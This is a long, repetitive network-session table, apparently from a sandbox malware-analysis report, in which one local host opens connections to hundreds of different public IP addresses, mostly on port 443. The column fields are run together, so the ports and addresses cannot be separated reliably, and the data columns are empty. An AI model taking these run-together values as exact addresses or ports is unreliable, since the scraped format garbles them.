                                    14120192.168.2.1350820186.212.182.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14121192.168.2.1343652132.202.115.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14122192.168.2.135087443.231.152.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14123192.168.2.1344682212.71.149.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14124192.168.2.134903061.145.39.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14125192.168.2.134416888.253.218.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14126192.168.2.1346526182.173.121.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14127192.168.2.1353430119.131.38.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14128192.168.2.1338976178.74.13.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14129192.168.2.1350466102.233.131.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14130192.168.2.135111282.18.199.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14131192.168.2.1349990134.42.252.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14132192.168.2.1335860126.224.69.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14133192.168.2.1349486182.31.58.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14134192.168.2.1355948138.233.65.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14135192.168.2.1342928134.170.121.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14136192.168.2.1359984207.93.10.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14137192.168.2.134648050.40.61.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14138192.168.2.135495877.9.185.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14139192.168.2.1342410134.51.123.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14140192.168.2.1347590202.21.251.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14141192.168.2.1341098105.182.241.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14142192.168.2.134898437.157.139.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14143192.168.2.1349764196.214.91.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14144192.168.2.1348254203.229.180.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14145192.168.2.135540417.6.210.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14146192.168.2.1340420101.183.145.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14147192.168.2.1354256125.99.186.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14148192.168.2.1353334167.188.78.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14149192.168.2.1359994134.173.181.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14150192.168.2.1336638124.75.211.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14151192.168.2.1334512156.146.202.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14152192.168.2.1339162156.1.193.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14153192.168.2.1334494109.41.186.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14154192.168.2.134583099.18.185.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14155192.168.2.134490043.220.62.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14156192.168.2.134268427.208.105.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14157192.168.2.133916499.94.116.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14158192.168.2.1360988132.134.56.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14159192.168.2.1333080118.173.67.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14160192.168.2.1358564203.7.92.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14161192.168.2.135289051.47.150.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14162192.168.2.1339926120.176.13.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14163192.168.2.133817292.171.139.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14164192.168.2.133920258.22.213.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14165192.168.2.1336646146.49.28.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14166192.168.2.1350096183.115.148.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14167192.168.2.1350570204.224.79.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14168192.168.2.1345094169.83.254.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14169192.168.2.13598168.13.104.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14170192.168.2.135465643.187.114.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14171192.168.2.135551060.77.98.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14172192.168.2.13582465.133.141.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14173192.168.2.135246688.42.30.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14174192.168.2.135667072.164.55.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14175192.168.2.1348512208.39.197.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14176192.168.2.1340630108.90.95.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14177192.168.2.135329014.243.32.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14178192.168.2.135753289.234.140.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14179192.168.2.1357206182.160.174.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14180192.168.2.1349778147.82.51.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14181192.168.2.135653499.119.50.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14182192.168.2.1334810192.243.5.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14183192.168.2.1349208159.58.155.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14184192.168.2.1360980170.111.14.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14185192.168.2.134678668.32.118.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14186192.168.2.133963873.113.135.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14187192.168.2.134994652.227.63.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14188192.168.2.1337160192.40.41.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14189192.168.2.1339138126.72.3.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14190192.168.2.1348136160.39.137.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14191192.168.2.1350232221.225.227.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14192192.168.2.133644289.162.17.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14193192.168.2.1336156177.19.114.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14194192.168.2.1338146129.115.79.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14195192.168.2.1353600112.152.134.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14196192.168.2.133585234.77.127.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14197192.168.2.1338272162.136.5.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14198192.168.2.1347998199.44.3.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14199192.168.2.1359050108.82.180.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14200192.168.2.1348168128.144.134.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14201192.168.2.134746678.126.102.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14202192.168.2.133581236.196.159.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14203192.168.2.1344504184.217.147.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14204192.168.2.134007857.82.211.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14205192.168.2.135234657.230.26.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14206192.168.2.135458879.3.124.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14207192.168.2.1357520126.212.99.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14208192.168.2.1339428186.127.107.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14209192.168.2.13408342.25.11.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14210192.168.2.1333212220.174.116.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14211192.168.2.1351890146.30.5.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14212192.168.2.1335106157.97.146.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14213192.168.2.1353772193.179.227.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14214192.168.2.1360476204.111.77.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14215192.168.2.1335298188.149.121.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14216192.168.2.1346496131.48.70.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14217192.168.2.134625061.187.115.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14218192.168.2.1347114182.107.254.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14219192.168.2.1349264207.201.46.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14220192.168.2.1355602124.100.113.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14221192.168.2.1351984221.255.72.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14222192.168.2.1358714205.95.89.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14223192.168.2.1353216200.246.61.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14224192.168.2.1350414159.134.56.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14225192.168.2.1344620222.16.241.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14226192.168.2.134591666.161.92.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14227192.168.2.1340600143.34.238.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14228192.168.2.1350600139.235.217.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14229192.168.2.1353814222.39.192.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14230192.168.2.1338254202.148.181.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14231192.168.2.1347636178.192.112.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14232192.168.2.135606286.28.39.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14233192.168.2.134252823.19.20.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14234192.168.2.134358049.201.210.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14235192.168.2.1340936212.56.52.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14236192.168.2.134557219.179.201.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14237192.168.2.136060898.71.202.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14238192.168.2.1340980159.49.172.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14239192.168.2.1337490122.39.170.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14240192.168.2.136015067.155.205.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14241192.168.2.13346589.234.26.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14242192.168.2.1349640222.82.2.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14243192.168.2.1354900182.22.155.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14244192.168.2.1344588213.16.147.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14245192.168.2.133882612.147.186.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14246192.168.2.136004231.147.197.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14247192.168.2.1344832116.5.223.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14248192.168.2.1348380219.229.139.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14249192.168.2.1349614223.233.32.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14250192.168.2.1347430183.208.26.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14251192.168.2.134962861.98.14.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14252192.168.2.1342048167.119.102.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14253192.168.2.1358352161.11.34.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14254192.168.2.1338118149.144.101.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14255192.168.2.1352194194.42.32.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14256192.168.2.1339666181.27.107.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14257192.168.2.1347692187.106.18.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14258192.168.2.1351306196.13.78.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14259192.168.2.1356512191.36.215.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14260192.168.2.1345662139.165.158.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14261192.168.2.133504457.248.90.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14262192.168.2.133590867.101.177.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14263192.168.2.133974486.244.43.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14264192.168.2.135510095.139.19.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14265192.168.2.135885688.56.40.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14266192.168.2.1335902203.193.146.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14267192.168.2.1338744195.131.185.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14268192.168.2.134286424.102.173.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14269192.168.2.1348258129.158.250.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14270192.168.2.1345650115.2.225.1308080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14271192.168.2.1347222160.113.113.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14272192.168.2.1334234126.125.124.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14273192.168.2.135227673.171.241.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14274192.168.2.1332954105.171.50.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14275192.168.2.134372432.242.89.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14276192.168.2.1354354142.253.173.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14277192.168.2.1340702207.213.87.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14278192.168.2.133555288.150.87.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14279192.168.2.134060483.225.183.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14280192.168.2.1357872175.200.173.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14281192.168.2.1347932213.60.244.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14282192.168.2.135535872.125.47.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14283192.168.2.1355300129.119.70.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14284192.168.2.1348998208.151.103.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14285192.168.2.133871866.212.24.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14286192.168.2.1335252133.78.81.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14287192.168.2.1339868112.54.74.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14288192.168.2.1347308120.26.242.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14289192.168.2.134460062.215.43.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14290192.168.2.134283852.38.92.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14291192.168.2.1332978212.144.42.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14292192.168.2.1345300122.10.88.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14293192.168.2.13365461.222.4.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14294192.168.2.134251823.191.103.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14295192.168.2.1352318179.2.226.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14296192.168.2.134617217.222.181.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14297192.168.2.1339072178.191.237.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14298192.168.2.134079483.7.124.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14299192.168.2.1337336147.167.115.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14300192.168.2.133389632.32.200.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14301192.168.2.1339084143.166.119.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14302192.168.2.134480457.162.91.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14303192.168.2.1359138223.90.63.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14304192.168.2.133902468.1.120.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14305192.168.2.135304670.142.111.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14306192.168.2.13394728.231.100.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14307192.168.2.1348342145.73.136.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14308192.168.2.135852645.76.178.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14309192.168.2.1345702130.108.129.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14310192.168.2.134695486.235.44.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14311192.168.2.1342522124.114.125.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14312192.168.2.1348372110.157.245.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14313192.168.2.135079882.154.29.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14314192.168.2.1335842194.138.20.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14315192.168.2.135591253.241.228.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14316192.168.2.1348060163.118.147.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14317192.168.2.1333996169.38.49.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14318192.168.2.134546219.234.202.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14319192.168.2.133324023.110.255.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14320192.168.2.133459837.26.37.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14321192.168.2.134773849.177.188.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14322192.168.2.136002059.244.3.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14323192.168.2.134899025.184.242.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14324192.168.2.1343804178.121.230.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14325192.168.2.1358956187.1.186.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14326192.168.2.135199871.163.231.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14327192.168.2.1345866216.22.4.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14328192.168.2.1356804167.184.98.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14329192.168.2.1354768201.133.247.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14330192.168.2.1356712189.173.145.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14331192.168.2.135598869.42.75.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14332192.168.2.134243097.55.152.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14333192.168.2.135707886.218.30.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14334192.168.2.1352036141.164.229.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14335192.168.2.134700839.56.134.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14336192.168.2.134084464.57.209.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14337192.168.2.135067052.117.184.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14338192.168.2.1341760177.201.121.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14339192.168.2.1342368126.61.175.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14340192.168.2.1345894168.230.29.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14341192.168.2.133283071.93.202.199443
                                    TimestampBytes transferredDirectionData


